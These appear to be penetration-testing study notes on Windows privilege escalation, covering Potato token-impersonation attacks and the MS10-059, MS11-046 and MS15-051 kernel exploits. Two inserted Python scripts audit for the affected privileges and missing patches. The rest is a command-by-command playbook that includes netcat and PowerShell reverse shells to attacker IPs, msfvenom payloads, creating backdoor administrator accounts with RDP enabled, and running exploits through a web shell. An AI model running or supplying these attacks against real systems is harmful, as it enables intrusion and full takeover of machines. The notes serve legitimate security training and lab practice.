4 Kernel Exploits

Windows PrivEsc Methods

Family          Versions
--------------  ------------------------------------------------------------------------------------------
Rogue Potato    Latest version; SHOULD work on Windows 10
Juicy Potato    Upgrade of Rotten; Server 2008 R2 (no hotfixes), Windows 7 Enterprise 6.1.7600; patched in latest Win-10
Rotten Potato   Old; year: 2016
Churrasco       Non-Potato
Chimichurri     Non-Potato: MS10-059

Basics

Required for Potato:

> whoami
Local Service

> whoami /priv
SeImpersonatePrivilege ..Enabled

Token Impersonations

Service accounts: you can't log in interactively with them, but they can be escalated.
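The two `whoami` lines above are the precondition every potato variant depends on: a service identity whose token carries an impersonation privilege. As an added audit check (not part of the original notes), the following Python parses constructed `whoami` / `whoami /priv` output and flags that combination, which is what a defender reviewing IIS application pools or service accounts wants to find and remediate (run the service under a dedicated account without the privilege, or patch past the affected builds). The sample output, the account list and the helper names are my own assumptions.

```python
import re

# Constructed sample output, modelled on what `whoami` and `whoami /priv` print for a
# built-in service account. Not captured from a real host.
SAMPLE_WHOAMI = "nt authority\\local service"
SAMPLE_WHOAMI_PRIV = """
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that let a process adopt a connecting client's token. A "Disabled" state
# does not help: the holder can re-enable its own privileges, so presence is what counts.
TOKEN_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Built-in service identities (assumed list); the trailing backslash entry matches any
# IIS application pool identity.
SERVICE_ACCOUNTS = (
    "nt authority\\local service",
    "nt authority\\network service",
    "iis apppool\\",
)


def parse_privileges(text):
    """Return {privilege_name: state} parsed from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*\s(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def is_service_account(name):
    """True for the built-in service identities listed in SERVICE_ACCOUNTS."""
    n = name.strip().lower()
    return any(n == s or (s.endswith("\\") and n.startswith(s)) for s in SERVICE_ACCOUNTS)


def assess(account, priv_text):
    """Combine account identity and token privileges into one finding."""
    privs = parse_privileges(priv_text)
    held = sorted(p for p in TOKEN_PRIVS if p in privs)
    svc = is_service_account(account)
    return {
        "account": account,
        "service_account": svc,
        "token_privs": held,
        # At risk: a service identity that holds an impersonation privilege.
        "at_risk": svc and bool(held),
    }


if __name__ == "__main__":
    print(assess(SAMPLE_WHOAMI, SAMPLE_WHOAMI_PRIV))
```

On a real host, feed the script the output of the two commands run in the service's context (for example from a scheduled audit job); a finding means the account, not just the host, needs attention.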

Rogue Potato

> RoguePotato.exe -r 10.x.x.x -l 9999 -e "C:\PrivEsc\reverse.exe"
> nc -nvlp 9999

Juicy Potato **BEST**

whoami /priv   ..SeImpersonatePrivilege = JuicyPotato
JuicyPotato.exe -l 5555 -p C:\PrivEsc\reverse.exe -t * -c GUID_CLSID
Juicy.Potato.x86.exe -l 5555 -p "C:\inetpub\wwwroot\shell.exe" -t * -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t *
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\inetpub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

nc -nvlp 5555
whoami ..system

Juicy Potato + Powershell

> cp /opt/JuicyPotato.exe jp.exe
> cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 revshell.ps1
> vim revshell.ps1
Add this to the end of the file:
Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 7600

> sudo impacket-smbserver kali .

> copy \\10.10.14.34\kali\jp.exe .
> jp.exe -t * -p C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -l 9001 -a "-c IEX(new-object net.webclient).downloadstring('http://$IP:9090/revshell.ps1')" -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

> nc -lvnp 7600
> whoami ..system!!

Rotten Potato

Exploit from 2016: service accounts could obtain a SYSTEM token and impersonate it.

churrasco

  • REF: Granny (HTB), Grandpa (HTB)

  • Token impersonation via churrasco, to escalate privileges to SYSTEM; developed by Cesar Cerrudo.

  • Server 2003 allows Network Service and Local Service to impersonate SYSTEM.

  • Patched by Microsoft in Windows 2012 (MS09-012).

  • On newer systems Juicy Potato works fine; on older systems, token impersonation is abused via the churrasco exploit.

  • If you have access to a box as nt authority\network service (e.g. you managed to upload an ASP.NET shell), you can easily elevate your privileges on the box.

  • You can download the exploit and compile it yourself, or use the one shipped with sqlninja at /usr/share/sqlninja/apps/churrasco.exe (sqlninja uses it when the sa password has been brute-forced).

  • After uploading you can easily:

    • Elevate your privileges.

    • Create an admin account.

    ------------------------
    Share from Kali/smb:
    
    locate churrasco.exe
    wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
    cp /usr/share/sqlninja/apps/churrasco.exe /tmp
    cp /usr/share/sqlninja/apps/nc.exe /tmp
    msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.98 LPORT=5555 -f exe > /tmp/venomshell.exe
    
    locate smbserver.py
    cd /usr/share/doc/python3-impacket/examples/
    sudo python3 smbserver.py share /tmp
    nc -nvlp 5555
    
    
    ------------------------
    Windows:
    
    whoami /priv    ..SeImpersonatePrivilege - Yes!
    systeminfo      ..Server 2003 - Yes!
    
    cd C:\Windows\Temp
    copy \\10.x.x.x\share\nc.exe .
    copy \\10.x.x.x\share\venomshell.exe .
    copy \\10.x.x.x\share\churrasco.exe .
    
    > \\10.x.x.x\share\churrasco.exe -d whoami
    > churrasco -d "net user /add <username> <password>"
    > churrasco -d "net localgroup administrators <username> /add"
    > churrasco -d "net localgroup \"Remote Desktop Users\" <username> /add"
    > churrasco -d "net user oscp oscp /add && net localgroup Administrators oscp /add"
    > churrasco -d "reg add \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
    linux> rdesktop -u oscp -p oscp 10.x.x.x
    
    > churrasco.exe -d venomshell.exe
    > churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
    > \\10.x.x.x\share\churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"

chimichurri

  • MS10-059

  • Server 2008 R2 Datacenter 6.1.7600 N/A Build 7600 No Patch 64bit

  • github/Re4son ..other blog:

cd /opt
git clone https://github.com/egre55/windows-kernel-exploits
cd "windows-kernel-exploits/MS10-059: Chimichurri/Compiled"
cp Chimichurri.exe .
python -m SimpleHTTPServer 4444

cd C:\ColdFusion8\  or:
cd C:\Windows\Temp
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Chimichurri.exe 10.10.14.xx 5555
nc -nvlp 5555
connected ..system!!

----------
or:

cd /usr/share/doc/python3-impacket/examples
sudo python3 ./smbserver.py share /tmp
nc -nvlp 5555

cd C:\Windows\Temp\
copy \\$MyIP\share\Chimichurri.exe .
Chimichurri.exe $MyIP 5555
system!!

----------
chimichurri.exe $MyIP 5555
nc -nvlp 5555
system!

MS11-046 (AFD PrivEsc)

  • The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input which allows local users to elevate privileges.

  • ms11-046.exe 6.1.7600 Build 7600 - for 32bit only

https://github.com/abatchy17/WindowsExploits
https://github.com/abatchy17/WindowsExploits/blob/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS11-046/MS11-046.exe

smbserver.py share
\\10.10.14.34\share\MS11-046.exe
whoami ..system!

https://github.com/rasta-mouse/Watson

or
Download from:
https://www.exploit-db.com/exploits/40564

Compile:
apt install mingw-w64  ..if not installed
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

python -m SimpleHTTPServer 8080
wget and curl are not installed on the machine however powershell is.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
whoami ..system!

MS15-051

MS15-051 privesc
github/hfiref0x ..compiled Taihou64.exe (Firefox flagged it as a virus)
github/SecWiki ..MS15-051 ..compiled ..zipped ..download

cp ms15-051x64.exe .
http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe whoami
system!

http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe "nc64.exe -e 10.x.x.x 5555"
nc -nvlp 5555
system!

Bonus PrivEsc:
ms15-051x64.exe whoami   ..easy
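All three kernel bugs in these notes (MS10-059, MS11-046, MS15-051) are closed by patching, so the defender's check is whether the hotfix is present on a host of the affected build. The following Python is an added example, not code from these notes or the linked repositories: it parses a constructed `systeminfo` excerpt (the version line mirrors the "6.1.7600 N/A Build 7600" string quoted above) and reports OS build, architecture and which of the three KBs is absent. The BULLETIN_KB mapping is filled in from memory of the Microsoft bulletins and should be verified against them; the sample output and function names are my assumptions.

```python
import re

# Constructed `systeminfo` excerpt, not captured from a real host.
SAMPLE_SYSTEMINFO = """
Host Name:                 WEB01
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2534111
                           [02]: KB2999226
                           [03]: KB3045171
"""

# Bulletin -> KB for the three kernel bugs these notes cover. Filled in from memory of
# the Microsoft bulletins (assumption): verify each against the bulletin text before use.
BULLETIN_KB = {
    "MS10-059": "KB982799",   # Chimichurri
    "MS11-046": "KB2503665",  # AFD (afd.sys)
    "MS15-051": "KB3045171",  # win32k
}


def parse_systeminfo(text):
    """Pull the fields the checks need out of `systeminfo` output."""
    info = {"hotfixes": set()}
    for line in text.splitlines():
        m = re.match(r"^(OS Name|OS Version|System Type):\s+(.*\S)\s*$", line)
        if m:
            info[m.group(1)] = m.group(2)
        # Hotfix lines look like "[03]: KB3045171"; collect every KB id on any line.
        info["hotfixes"].update(re.findall(r"\bKB\d{6,7}\b", line))
    return info


def assess_host(text):
    """Report build, architecture and the bulletins whose KB is not installed."""
    info = parse_systeminfo(text)
    ver = re.match(r"(\d+\.\d+)\.(\d+)", info.get("OS Version", ""))
    return {
        "os": info.get("OS Name", "?"),
        "version": ver.group(1) if ver else "?",
        "build": ver.group(2) if ver else "?",
        "x64": "x64" in info.get("System Type", "").lower(),
        "missing": sorted(b for b, kb in BULLETIN_KB.items() if kb not in info["hotfixes"]),
    }


if __name__ == "__main__":
    print(assess_host(SAMPLE_SYSTEMINFO))
```

An absent KB on a later build is not proof of exposure (cumulative updates supersede individual KBs), so treat a hit as a prompt to confirm the patch level, and note the architecture: the MS11-046 binary referenced above is 32-bit only.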

Send and Execute

impacket-smbserver share `myfolder`
http://10.x.x.x/ippsec.php?fexe=\\10.x.x.x\share\privesc.exe whoami
